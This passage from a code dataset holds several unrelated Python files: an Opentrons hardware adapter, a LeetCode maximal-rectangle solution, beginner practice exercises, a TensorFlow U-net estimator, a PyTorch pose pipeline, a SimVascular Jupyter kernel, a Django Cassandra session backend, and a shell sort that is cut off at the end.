this\n simulator will be replaced with a new controller that connects to the\n hardware with the specified arguments.\n\n Attribute accesses are passed on to the embedded\n :py:class:`.hardware_control.API`.\n \"\"\"\n\n def __init__(self, loop: asyncio.AbstractEventLoop = None) -> None:\n self._api = API.build_hardware_simulator(loop=loop)\n\n def __getattr__(self, attr_name):\n return getattr(self._api, attr_name)\n\n def connect(self, port: str = None):\n \"\"\" Connect to hardware.\n\n :param port: The port to connect to. May be `None`, in which case the\n hardware will connect to the first serial port it sees\n with the device name `FT232R`; or port name compatible\n with `serial.Serial`_. # noqa(E501)\n \"\"\"\n old_api = object.__getattribute__(self, '_api')\n loop = old_api._loop\n config = loop.run_until_complete(old_api.config)\n new_api = loop.run_until_complete(API.build_hardware_controller(\n loop=loop,\n port=port,\n config=copy.copy(config)))\n old_api._loop.run_until_complete(new_api.cache_instruments())\n setattr(self, '_api', new_api)\n\n def disconnect(self):\n \"\"\" Disconnect from connected hardware. \"\"\"\n old_api = object.__getattribute__(self, '_api')\n config = old_api._loop.run_until_complete(old_api.config)\n new_api = API.build_hardware_simulator(\n loop=old_api._loop,\n config=copy.copy(config))\n setattr(self, '_api', new_api)\n\n def is_connected(self):\n \"\"\" `True` if connected (e.g. has a real controller backing it). 
\"\"\"\n api = object.__getattribute__(self, '_api')\n return api.is_simulator_sync\n\n async def disengage_axes(self, which: List[str]):\n api = object.__getattribute__(self, '_api')\n await api.disengage_axes([Axis[ax.upper()] for ax in which])\n\n async def get_attached_pipettes(self):\n \"\"\" Mimic the behavior of robot.get_attached_pipettes\"\"\"\n api = object.__getattribute__(self, '_api')\n instrs = {}\n attached = await api.attached_instruments\n for mount, data in attached.items():\n instrs[mount.name.lower()] = {\n 'model': data.get('model', None),\n 'name': data.get('name', None),\n 'id': data.get('pipette_id', None),\n 'mount_axis': Axis.by_mount(mount),\n 'plunger_axis': Axis.of_plunger(mount)\n }\n if data.get('model'):\n instrs[mount.name.lower()]['tip_length'] \\\n = data.get('tip_length', None)\n\n return instrs\n","sub_path":"api/src/opentrons/hardware_control/adapters.py","file_name":"adapters.py","file_ext":"py","file_size_in_byte":8704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"255633964","text":"import unittest\n\n\nclass Solution(object):\n def solve(self, matrix):\n if matrix is None or len(matrix) < 1:\n return 0\n\n length, width = len(matrix), len(matrix[0])\n left, right = [0] * width, [width] * width\n height = [0] * width\n result = 0\n\n for i in range(length):\n curr_left, curr_right = 0, width\n\n # calculate left boundary\n for j in range(width):\n if matrix[i][j] == '1':\n left[j] = max(left[j], curr_left)\n else:\n left[j] = 0\n curr_left = j + 1\n\n # calculate right boundary\n for j in reversed(range(width)):\n if matrix[i][j] == '1':\n right[j] = min(right[j], curr_right)\n else:\n right[j] = width\n curr_right = j\n\n # calculate height\n for j in range(width):\n if matrix[i][j] == '1':\n height[j] += 1\n else:\n height[j] = 0\n\n area = [(right[k] - left[k]) * height[k] for k in range(width)]\n result = max(result, max(area))\n return result\n\n\nclass SolutionTestCase(unittest.TestCase):\n def test_example(self):\n m = ['11001',\n '01001',\n '00111',\n '00111',\n '00001']\n self.assertEqual(Solution().solve(m), 6)\n\n def test_first(self):\n m = ['10100',\n '10111',\n '11111',\n '10010']\n self.assertEqual(Solution().solve(m), 6)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"leetcode/85.max_rectangle.py","file_name":"85.max_rectangle.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"391539913","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\ndef product(x, y=1, *numbers):\n sum = x * y\n for i in numbers:\n sum = sum * i\n return sum\n\n\n# print(product(1, 2, 3))\n\n\ndef fact(n):\n if n == 1:\n return 1\n return n * fact(n - 1)\n\n\n# print(fact(1000))\n\n\ndef fact_iter(num, product):\n if num == 1:\n return product\n return fact_iter(num - 1, num * product)\n\n\n# print(fact_iter(1000, 1))\n\n# 汉诺塔的移动\n# 阶段一: 将前(n-1)个盘子从 A 经过C 移到 B\n# 阶段二: 将第n个最大的盘子从 A 经过B 移到 C(n=1)\n# 阶段三: 将(n-1)个盘子从 B 经过A 移到 C\n\n\ndef move(n, a, b, c):\n if n == 1:\n print(a, ' --> ', c)\n else:\n move(n - 1, a, c, b)\n move(1, a, b, c)\n move(n - 1, b, a, c)\n\n return None\n\n\n# move(3, 'A', 'B', 'C')\n\nL = ['Michael', 'Sarah', 'Tracy', 'Bob', 'Jack']\nr = []\nn = 3\nfor i in range(3):\n r.append(L[i])\n\n# print(r)\n\n# 去除字符串头尾空格\n\n\ndef trim(s):\n if s[:1] == ' ':\n return trim(s[1:])\n elif s[-1:] == ' ':\n return trim(s[:-1])\n else:\n return s\n\n\n# print(trim(' hello 
'))\n'''\n if trim('hello ') != 'hello':\n print('测试失败!')\n elif trim(' hello') != 'hello':\n print('测试失败!')\n elif trim(' hello ') != 'hello':\n print('测试失败!')\n elif trim('') != '':\n print('测试失败!')\n elif trim(' ') != '':\n print('测试失败!')\n else:\n print('测试成功!')\n\n for i, value in enumerate(['A', 'B', 'C']):\n print(i, value)\n\n '''\n\n\ndef findMinAndMax(L):\n if len(L) == 0:\n min = None\n max = None\n else:\n min = L[0]\n max = L[0]\n for i in L:\n if min > i:\n min = i\n if max < i:\n max = i\n return min, max\n\n\n'''\nif findMinAndMax([]) != (None, None):\n print(findMinAndMax([]))\n print('Flase')\nelif findMinAndMax([7]) != (7, 7):\n print(findMinAndMax([7]))\n print('Flase')\nelif findMinAndMax([7, 1]) != (1, 7):\n print(findMinAndMax([7, 1]))\n print('Flase')\nelif findMinAndMax([7, 1, 3, 9, 5]) != (1, 9):\n print(findMinAndMax([7, 1, 3, 9, 5]))\n print('Flase!')\nelse:\n print('True!')\n '''\n\nL1 = ['Hello', 'World', 18, 'Apple', None]\n\nL2 = [s.lower() for s in L1 if isinstance(s, str)]\n\n# print(L2)\n\n\ndef fib(max):\n n, a, b = 0, 0, 1\n while n < max:\n print(b)\n a, b = b, a + b\n n = n + 1\n return 'done'\n\n\n# fib(6)\n\n\ndef fgb(max):\n n, a, b = 0, 0, 1\n while n < max:\n yield (b)\n a, b = b, a + b\n n = n + 1\n return 'done'\n\n\n# g = fgb(6)\n# for n in g:\n# print(n)\n\n\ndef triangles():\n L = [1]\n while True:\n yield L\n # yield L[:]\n # yield list(L)\n L.append(0)\n L = [L[x - 1] + L[x] for x in range(len(L))]\n\n\ndef triangle():\n L = [1]\n while True:\n yield L\n L = [1] + [L[x - 1] + L[x] for x in range(1, len(L - 2))] + [1]\n\n\n'''\n杨辉三角 生成器generator\n这句话有问题\n因为L作为List是可变的。注意测试的代码,相当于result.append(L),在函数里面每改变一次L,result里面的元素也会跟着变。\n而List(L)相当于生成一个新的列表进行返回,你后面对L的改变都不会影响到以前加进去的元素。\n\nn = 0\nresults = []\nfor t in triangles():\n # print(t)\n for i in t:\n print('%5d' % (i), end='')\n print()\n results.append(t)\n n = n + 1\n if n == 10:\n break\n'''\n","sub_path":"Learn/Python/Python_learn/0_Introduction/0.test.py","file_name":"0.test.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"438437977","text":"\"\"\" Demonstration how create and use tf.estimator.Estimator with U-net\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\n\nfrom tensorflow.nn import sigmoid\nfrom idog.detection.unet import make_unet, get_loss, IOU\n\n\ndef create_summary(data):\n \"\"\"\n Create summary for the model\n\n :param data: dict: two required keys - scalar and image, values -\n lists of tuple with display name and elements of tf.graph\n :return:\n \"\"\"\n for i in data[\"scalar\"]:\n tf.summary.scalar(i[0], i[1])\n for i in data[\"image\"]:\n tf.summary.image(i[0], i[1])\n\n\ndef make_unet_estimator(features, labels, mode, params):\n \"\"\"\n Creation of tf.estimator.Estimator for U-net\n\n :param features: tf.Tensor: images\n :param labels: tf.Tensor: masks\n :param mode: tf.estimator.ModeKeys\n :param params: dict: params of the model\n :return: tf.estimator.EstimatorSpec\n \"\"\"\n orig_images = features\n true_masks = labels\n net = make_unet(orig_images, num_filters=params[\"num_filters\"], num_blocks=params[\"num_blocks\"],\n batch_normalization=params[\"batch_normalization\"], training=params[\"training\"])\n predictions = {\n \"predicted_soft_masks\": sigmoid(net),\n \"predicted_masks\": tf.round(sigmoid(net))\n }\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(mode, predictions)\n\n loss = get_loss(net, true_masks, 
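# The triangles() generator in the learning file above documents its own
# pitfall: yielding the live list lets later mutation corrupt rows the caller
# already received. A fixed, stand-alone version that yields a copy (names
# are illustrative):
def pascal_rows():
    row = [1]
    while True:
        yield row[:]  # copy, so callers keep a stable snapshot
        row = [1] + [row[i - 1] + row[i] for i in range(1, len(row))] + [1]

gen = pascal_rows()
for _ in range(5):
    print(next(gen))
# [1] / [1, 1] / [1, 2, 1] / [1, 3, 3, 1] / [1, 4, 6, 4, 1]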
lam=params[\"IOU_weight\"])\n\n if params[\"create_summary\"]:\n data = {\n \"scalar\": [(\"Loss\", loss), (\"IOU\", IOU(net, true_masks))],\n \"image\": [(\"Predicted_masks\", sigmoid(net)), (\"Original_images\", orig_images),\n (\"Original_masks\", true_masks)]\n }\n create_summary(data)\n\n if mode == tf.estimator.ModeKeys.TRAIN:\n global_step = tf.train.get_or_create_global_step()\n learning_rate = tf.train.exponential_decay(params[\"learning_rate\"], global_step,\n params[\"lr_decay_steps\"], params[\"lr_decay_rate\"], staircase=True)\n\n optim = tf.train.AdamOptimizer(learning_rate=learning_rate)\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n train_op = optim.minimize(loss, global_step=global_step)\n return tf.estimator.EstimatorSpec(mode, loss=loss, train_op=train_op)\n\n eval_metric_ops = {\"IOU\": tf.metrics.mean(IOU(net, labels))}\n\n return tf.estimator.EstimatorSpec(mode, loss=loss, eval_metric_ops=eval_metric_ops)\n\n\ndef random_image_generator():\n \"\"\"\n Generates simple data for the model\n\n :return: tuple of nd.array: image and mask\n \"\"\"\n random_img = np.random.random((1000, 32, 32, 1)).astype(np.float32)\n predicted_img = (random_img > 0.9).astype(int).astype(np.float32)\n for img, mask in zip(random_img, predicted_img):\n yield img, mask\n\n\ndef input_evaluation_set():\n \"\"\"\n Gives simple numpy dataset for the problem\n\n :return: tuple of nd.array: images and masks\n \"\"\"\n random_img = np.random.random((1000, 32, 32, 1)).astype(np.float32)\n predicted_img = (random_img > 0.9).astype(int).astype(np.float32)\n return random_img, predicted_img\n\n\ndef input_fn_from_generator():\n \"\"\"\n Creates example of tf.data.Dataset from generator\n\n :return: tf.data.Dataset\n \"\"\"\n tr_data = tf.data.Dataset.from_generator(random_image_generator, (tf.float32, tf.float32),\n (tf.TensorShape([32, 32, 1]), tf.TensorShape([32, 32, 1]))).batch(5)\n return tr_data\n\n\nif __name__ == \"__main__\":\n\n params = {\n \"num_blocks\": 4,\n \"num_filters\": 8,\n \"IOU_weight\": 0.1,\n \"learning_rate\": 0.001,\n \"lr_decay_steps\": 1000,\n \"lr_decay_rate\": 0.96,\n \"training\": None,\n \"batch_normalization\": False,\n \"create_summary\": True\n }\n tf.logging.set_verbosity(tf.logging.INFO)\n imgs, masks = input_evaluation_set()\n segmentator = tf.estimator.Estimator(model_fn=make_unet_estimator, model_dir=\"../../data/model\", params=params)\n input_fn_from_numpy = tf.estimator.inputs.numpy_input_fn(x=imgs, y=masks, batch_size=10, num_epochs=10,\n shuffle=False)\n segmentator.train(input_fn=input_fn_from_generator)\n segmentator.train(input_fn=input_fn_from_numpy)\n","sub_path":"idog_original/idog/detection/unet_estimator.py","file_name":"unet_estimator.py","file_ext":"py","file_size_in_byte":4397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"592487150","text":"import torch\nimport numpy as np\n\nclass Pipeline():\n def __init__(self, encoder, model, device):\n self.encoder = encoder\n self.model = model\n self.device = device\n\n # Input: x = images as list of numpy arrays\n # Output: y = pose as 6D representation\n def process(self, images):\n # Disable gradients for the encoder\n with torch.no_grad():\n # Convert images to AE codes\n codes = []\n for img in images:\n # Normalize image\n img_max = np.max(img)\n img_min = np.min(img)\n img = (img - img_min)/(img_max - img_min)\n\n # Run image through encoder\n img = 
torch.from_numpy(img).unsqueeze(0).permute(0,3,1,2).to(self.device)\n #print(img.shape)\n code = self.encoder(img.float())\n code = code.detach().cpu().numpy()[0]\n norm_code = code / np.linalg.norm(code)\n codes.append(norm_code)\n\n # Predict poses from the codes\n batch_codes = torch.tensor(np.stack(codes), device=self.device, dtype=torch.float32)\n predicted_poses = self.model(batch_codes)\n return predicted_poses\n","sub_path":"pytorch3d/Pipeline.py","file_name":"Pipeline.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"19297345","text":"# Copyright (c) Stanford University, The Regents of the University of\n# California, and others.\n#\n# All Rights Reserved.\n#\n# See Copyright-SimVascular.txt for additional details.\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish,\n# distribute, sublicense, and/or sell copies of the Software, and to\n# permit persons to whom the Software is furnished to do so, subject\n# to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included\n# in all copies or substantial portions of the Software.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS\n# IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED\n# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A\n# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER\n# OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nfrom ipykernel.kernelbase import Kernel\n\nfrom os import unlink, environ\n\nimport base64\nimport imghdr\nimport re\nimport signal\nimport urllib\n\n# added by me to try and add version number\nfrom subprocess import check_output\n\nfrom simvascular_python_kernel import subprocess_repl, simvascular_python_proxy\n\n__version__ = '1.0.0'\n\nversion_pat = re.compile(r'version (\\d+(\\.\\d+)+)')\n\nclass SimVascularPythonKernel(Kernel):\n implementation = 'simvascular_python_kernel'\n implementation_version = __version__\n\n @property\n def language_version(self):\n m = version_pat.search(self.banner)\n return m.group(1)\n\n _banner = None\n\n @property\n def banner(self):\n if self._banner is None:\n self._banner = \"SimVascular Version REPLACE_SV_TIMESTAMP\"\n return self._banner\n\n language_info = {'name': 'simvascular_python',\n 'codemirror_mode': 'shell',\n 'mimetype': 'text/x-sh',\n 'file_extension': '.py'}\n\n def __init__(self, **kwargs):\n Kernel.__init__(self, **kwargs)\n repl = subprocess_repl.SubprocessRepl(['C:\\\\Program Files\\\\SimVascular\\\\SimVascular\\\\REPLACE_SV_TIMESTAMP\\\\sv.bat', '-python', '--', '-i'])\n self.proxy = simvascular_python_proxy.ReplProxy(repl)\n\n def do_execute(self, code, silent, store_history=True,\n user_expressions=None, allow_stdin=False):\n if not code.strip():\n 
return {'status': 'ok', 'execution_count': self.execution_count,\n 'payload': [], 'user_expressions': {}}\n \n self.proxy.send_input(code)\n output = self.proxy.get_output()\n\n message = {'name': 'stdout', 'text': output}\n self.send_response(self.iopub_socket, 'stream', message)\n\n return {'status': 'ok', 'execution_count': self.execution_count,\n 'payload': [], 'user_expressions': {}}\n","sub_path":"BuildWithMake/Release/Jupyter/windows/site-packages/simvascular_python_kernel/kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"171196826","text":"\"\"\"\nComposants et systèmes reliés aux ponts.\n----------------------------------------\n\nLe concept de :class:`Pont` est un composant associé à un :class:`cyme.simulation.graphe.Noeud`, capable de se déplacer sur un graphe représentant des cuves. Le behavior tree ci-dessous montre l'IA de la machine. Essentiellement, on boucle sur les étapes:\n\n * si le pont est utilisable (c'est-à-dire dans un état où il n'est pas brisé)\n * si l'opérateur n'est pas en pause\n * si le pont doit participer à un \"move prioritaire\", par exemple un transbordement qui nécessite le déplacement de plusiers ponts.\n * si le pont est positionné par dessus la bonne cuve (Kanban.get_current_target())\n * laisser passer un temps de réalisation (Delay) pour la tâche en cours (Kanban)\n\nAvec le système gestionnaire_pont, les ponts permettent de représenter la majorité des opérations qui sont exécutées dans un centre d'électrolyse.\n\n.. image:: images/bt_pont.png\n :align: center\n\nAfin de garder le behavior tree le plus réactif possible l'exéction d'un Kanban est fait d'une manière non-atomique.\nLe Kanban en cours peut être mis en pause ou annulé par le système gestionnaire_pont si on le pont est nécessaire à une tâche plus importante, par exemple un transbordement.\nLe pont devra exécuter le même Kanban tant que le booléen \"completed\" n'est pas vrai.\n\n\n\"\"\"\n\nfrom collections import deque\n\nfrom kivy.core.text import Label as CoreLabel\nfrom kivy.graphics.context_instructions import Color, PushMatrix, PopMatrix, Rotate, Translate\nfrom kivy.graphics.vertex_instructions import Rectangle, Line\n\nfrom .. import ecs\nfrom .. import bt\n\nfrom . import bt_pont\nfrom .. 
import simulation\n\n\nclass Pont(ecs.Component):\n MSE, PACD, MTC = range(3)\n\n def __init__(self, nom, index, mobile=None, entity_manager=None, noeud_entrepot=None):\n self.nom = nom\n self.root = None\n self.mobile = mobile\n self.nature = Pont.MSE\n self.secteur = None\n\n self.kanbans = deque([])\n self.kanbans_lock = False\n self.is_operation = False\n self.bris = deque([])\n self.is_bris = False\n self.pauses = deque([])\n self.is_pause = False\n self.rdc = deque([])\n self.is_rdc = False\n\n self.entity_manager = entity_manager\n self.noeud_entrepot = noeud_entrepot\n self.gestionnaire_pont = None\n\n self.setup_behavior()\n\n def set_gestionnaire_pont(self, gestionnaire):\n self.gestionnaire_pont = gestionnaire\n\n def setup_behavior(self):\n \"\"\" Setup du behavior tree pour le traitements des files de kanbans\n C'est ici qu'on fait les ajustements nécessaires pour les arbres bris, pauses et kanbans\n Notamment on ajoute le noeud déplacement du mobile en pretache pour le bt kanbans\n \"\"\"\n self.root = bt.Selector()\n\n parallel_bris_pauses = bt.Parallel()\n self.root.add_child(parallel_bris_pauses)\n\n bris = self.setup_behavior_kanban(\"bris\")\n pauses = self.setup_behavior_kanban(\"pauses\")\n parallel_bris_pauses.add_child(bris)\n parallel_bris_pauses.add_child(pauses)\n\n parallel_kanbans_rdc = bt.Parallel()\n self.root.add_child(parallel_kanbans_rdc)\n\n inverter = bt.Inverter()\n inverter.add_child(bt_pont.IsLocked(self))\n\n kanbans = self.setup_behavior_kanban(\"kanbans\", preconditions=[inverter], pretaches=[bt_pont.MoveToTarget(self, \"kanbans\")])\n parallel_kanbans_rdc.add_child(kanbans)\n\n rdc = self.setup_behavior_kanban(\"rdc\", pretaches=[bt_pont.MoveToTarget(self, \"rdc\")])\n parallel_kanbans_rdc.add_child(rdc)\n\n\n def setup_behavior_kanban(self, queue, preconditions=list(), pretaches=list(), postconditions=list(), posttaches=list()):\n \"\"\" Setup du behavior tree de base pour le traitement des files de kanban\n L'argument queue est le nom de la file qui doit être affectée par le bt, soit kanbans, pauses ou bris.\n Les arguments preconditions, pretaches, postconditions et posttaches permettent de\n d'ajouter des comportements supplémentaires aux principaux composants de l'arbre.\n \"\"\"\n root = bt.SequenceStar()\n inverter = bt.Inverter()\n inverter.add_child(bt_pont.IsQueueEmpty(self, queue))\n root.add_child(inverter)\n\n root.add_child(bt_pont.Precondition(self, queue))\n for precondition in preconditions:\n root.add_child(precondition)\n\n root.add_child(bt_pont.Pretache(self, queue))\n for pretache in pretaches:\n root.add_child(pretache)\n\n root.add_child(bt_pont.Tache(self, queue))\n\n root.add_child(bt_pont.Postcondition(self, queue))\n for postcondition in postconditions:\n root.add_child(postcondition)\n\n root.add_child(bt_pont.Posttache(self, queue))\n for posttache in posttaches:\n root.add_child(posttache)\n return root\n\n def __repr__(self):\n return \"{0}\".format(self.nom)\n\n def update(self):\n \"\"\"Update du bb et du bt.\"\"\"\n self.root.run()\n\n\nclass RenderPont(ecs.System):\n \"\"\"Systeme pour le rendering des ponts.\"\"\"\n\n\n\n def __init__(self, canvas, couleurs, textures):\n super().__init__()\n self.canvas = canvas\n self.couleurs = couleurs\n self.textures = textures\n self.cadran = None\n\n def init(self):\n pass\n\n def reset(self):\n pass\n\n def set_cadran(self):\n # Pour reference seulement\n # On split l'écran en 4 cadrans\n # index, position, size\n # BG = (0, (0,0),(550,350))\n # BD = (1, 
(550,0),(550,350))\n # HG = (2, (0,350),(550,350))\n # HD = (3, (550,350),(550,350))\n self.cadran = [[], [], [], []]\n for entity, pont in self.entity_manager.pairs_for_type(Pont):\n x = pont.mobile.noeud.box.pos[0]\n y = pont.mobile.noeud.box.pos[1]\n if y < 350:\n if x < 550:\n self.cadran[0].append(pont)\n pont.cadran = 0\n pont.position_label = 0\n else:\n self.cadran[1].append(pont)\n pont.cadran = 1\n pont.position_label = 0\n else:\n if x < 550:\n self.cadran[2].append(pont)\n pont.cadran = 2\n pont.position_label = 0\n else:\n self.cadran[3].append(pont)\n pont.cadran = 3\n pont.position_label = 0\n\n def set_postion_label(self):\n for cadran in self.cadran:\n if len(cadran) > 1:\n for i, pont in enumerate(cadran):\n if i == 0:\n continue\n pont.position_label += i * 30\n\n def draw_text(self, text, font_size, x, y):\n label = CoreLabel(text=\"{0}\".format(text), font_size=font_size)\n label.refresh()\n texture = label.texture\n Rectangle(size=texture.size, pos=(x,y), texture=texture)\n\n def draw_text_with_rotation(self, text, font_size, x, y, angle):\n PushMatrix()\n label = CoreLabel(text=\"{0}\".format(text), font_size=font_size)\n label.refresh()\n texture = label.texture\n Translate(x, y)\n Rotate(angle, 0, 0, 1)\n Rectangle(size=texture.size, pos=(0, 0), texture=texture)\n PopMatrix()\n\n def temps_total_completion(self, pont):\n t = 0\n for k in pont.kanbans:\n t += k.operation.get_duree(pont)\n return t\n\n def update(self, dt):\n #self.set_cadran()\n #self.set_postion_label()\n with self.canvas.after:\n label_pont_x, label_pont_y = (40,25)\n for entity, pont in self.entity_manager.pairs_for_type(Pont):\n box = pont.mobile.noeud.box\n Color(box.color[0], box.color[1], box.color[2], box.alpha)\n Rectangle(pos=box.pos, size=box.size)\n Color(box.contour_color[0], box.contour_color[1], box.contour_color[2], box.alpha)\n Line(rectangle=box.pos + (12, 36))\n self.draw_text(pont.nom, 14, box.pos[0], box.pos[1] + 40)\n\n for entity, pont in self.entity_manager.pairs_for_type(Pont):\n PopMatrix()\n self.draw_text(pont.nom, 14, label_pont_x - 30, label_pont_y)\n queue_names = [\"kanbans\", \"pauses\", \"bris\", \"rdc\"]\n x, y = label_pont_x, label_pont_y\n for queue_name in queue_names:\n x = label_pont_x\n queue = getattr(pont, queue_name)\n old_name = \"\"\n if queue:\n Color(0,0,0,1)\n t = queue[0].temps_restant\n seconde = t % 3600\n minute = seconde // 60\n seconde = seconde % 60\n self.draw_text(\"[{0:02d}m{1:02d}s]\".format(minute, seconde), 12, x-10, y)\n if queue_name == \"kanbans\":\n t = self.temps_total_completion(pont)\n heure = t // 3600\n seconde = t % 3600\n minute = seconde // 60\n seconde = seconde % 60\n self.draw_text(\"[{0:02d}h{1:02d}m{2:02d}s]\".format(heure, minute, seconde), 12, x - 10, y-20)\n for i, kanban in enumerate(queue):\n kanban_position_x = 50\n if i < 79:\n color = kanban.operation.get_color()\n Color(color[0], color[1], color[2], 1)\n Rectangle(pos=(x+kanban_position_x,y), size=(16,16))\n if isinstance(kanban, simulation.kanban.Kanban):\n Color(0,0,0,1)\n self.draw_text(\"{0:02d}\".format(kanban.debut+1), 11, x+kanban_position_x+2, y)\n elif isinstance(kanban, simulation.kanban.DelayedKanban):\n Color(0,0,0,1)\n self.draw_text(\"{0:02d}\".format(kanban.duree//60), 11, x+kanban_position_x+2, y)\n elif isinstance(kanban, simulation.kanban.DeltaKanban):\n Color(0,0,0,1)\n self.draw_text(\"{0:02d}\".format(kanban.debut+1), 11, x+kanban_position_x+2, y)\n if kanban.operation.name != old_name:\n Color(0,0,0,1)\n 
self.draw_text_with_rotation(kanban.operation.name, 12, x+kanban_position_x, y+5, 45)\n old_name = kanban.operation.name\n else:\n Color(0, 0, 0, 1)\n self.draw_text(\"...\",14,x+kanban_position_x, y)\n break\n x += 20\n y += 30\n label_pont_y += 100\n PushMatrix()\n","sub_path":"electrolyse/pont.py","file_name":"pont.py","file_ext":"py","file_size_in_byte":11327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"522622268","text":"import lazyboy\nimport time\nimport logging\nfrom lazyboy.key import Key\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.utils.encoding import force_unicode\nfrom django.contrib.sessions.backends.base import SessionBase, CreateError\n\nCASSANDRA_POOL = getattr(settings, 'CASSANDRA_POOL', None)\nCASSANDRA_SESSION_KEYSPACE = getattr(settings, 'CASSANDRA_SESSION_KEYSPACE', None)\n\nif CASSANDRA_POOL is None or CASSANDRA_SESSION_KEYSPACE is None:\n raise ImproperlyConfigured(u'To use cassandra-sessions, you must first set the CASSANDRA_SESSION_KEYSPACE and CASSANDRA_POOL settings in your settings.py')\nelse:\n try:\n lazyboy.connection.get_pool(CASSANDRA_SESSION_KEYSPACE)\n except lazyboy.exceptions.ErrorCassandraClientNotFound:\n lazyboy.connection.add_pool(CASSANDRA_SESSION_KEYSPACE, CASSANDRA_POOL)\n\nclass SessionStore(SessionBase):\n \"\"\"\n A Cassandra-based session store.\n \"\"\"\n \n def get_session(self, session_key):\n logging.debug('Getting session: %s' % session_key)\n session = None\n if session_key:\n try:\n key = Key(\n keyspace=CASSANDRA_SESSION_KEYSPACE,\n column_family=\"Sessions\",\n key=session_key\n )\n record = lazyboy.record.Record()\n session_record = record.load(key)\n session_values = session_record.values()\n if session_values:\n session = session_values[0]\n except lazyboy.exceptions.ErrorNoSuchRecord:\n pass\n return session\n \n def load(self):\n session_data = self.get_session(self.session_key)\n if session_data is not None:\n expiry, data = int(session_data[:15]), session_data[15:]\n if expiry < time.time():\n return {}\n else:\n return self.decode(force_unicode(data))\n self.create()\n return {}\n \n def create(self):\n while True:\n self.session_key = self._get_new_session_key()\n try:\n self.save()\n except CreateError:\n continue\n self.modified = True\n return\n \n def save(self, must_create=True):\n data = self.encode(self._get_session(no_load=True))\n encoded = '%15d%s' % (int(time.time()) + self.get_expiry_age(), data)\n key = Key(\n keyspace=CASSANDRA_SESSION_KEYSPACE,\n column_family=\"Sessions\",\n key=self.session_key\n )\n record = lazyboy.record.Record()\n record.key = key\n record[self.session_key] = encoded\n record.save()\n \n def exists(self, session_key):\n session_data = self.get_session(session_key)\n if session_data is not None:\n expiry, data = int(session_data[:15]), session_data[15:]\n if expiry < time.time():\n return False\n else:\n return True\n return False\n \n def delete(self, session_key=None):\n if session_key is None:\n if self._session_key is None:\n return\n session_key = self._session_key\n key = Key(\n keyspace=CASSANDRA_SESSION_KEYSPACE,\n column_family=\"Sessions\",\n key=session_key\n )\n # make this session expire right now\n data = self.encode({})\n encoded = '%15d%s' % (int(time.time()), data)\n record = lazyboy.record.Record()\n record.key = key\n record[self.session_key] = encoded\n 
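# The Cassandra session store packs an expiry timestamp into the first 15
# characters of each stored blob ('%15d' space-pads the unix time) with the
# serialized session after it. A stand-alone sketch of that encoding
# (function names are hypothetical):
import time

def pack(data, ttl_seconds):
    return '%15d%s' % (int(time.time()) + ttl_seconds, data)

def unpack(blob):
    # int() tolerates the leading padding spaces.
    expiry, data = int(blob[:15]), blob[15:]
    return expiry, data, expiry < time.time()  # third field: expired?

print(unpack(pack('payload', 3600)))  # (<expiry>, 'payload', False)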
record.save()","sub_path":"cassandra_sessions/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"91938474","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n@File : 10_希尔排序.py\n@Time : 2019/4/7 22:01:52\n@Author : LJL\n@Version : 1.0\n@Email : 491692391@qq.com\n@License : (C)Copyright 2019-2100, LJL\n@Desc : None\n\n'''\n# here put the import lib\n\n\nimport random\n\n\ndef shell_sort(alist):\n \"\"\"希尔排序\"\"\"\n n = len(alist)\n gap = n // 2\n while gap >= 1:\n for i in range(gap, n):\n for j in range(i, 0, -gap):\n if alist[j] < alist[j-gap]:\n alist[j], alist[j-gap] = alist[j-gap], alist[j]\n else:\n break\n gap //= 2\n\n return alist\n\n\nif __name__ == '__main__':\n list_test = [random.randint(0, 100) for i in range(random.randint(8, 15))]\n print('原来的列表:\\t{}'.format(list_test))\n print('sorted排序:\\t{}'.format(sorted(list_test)))\n insert_list = shell_sort(list_test)\n 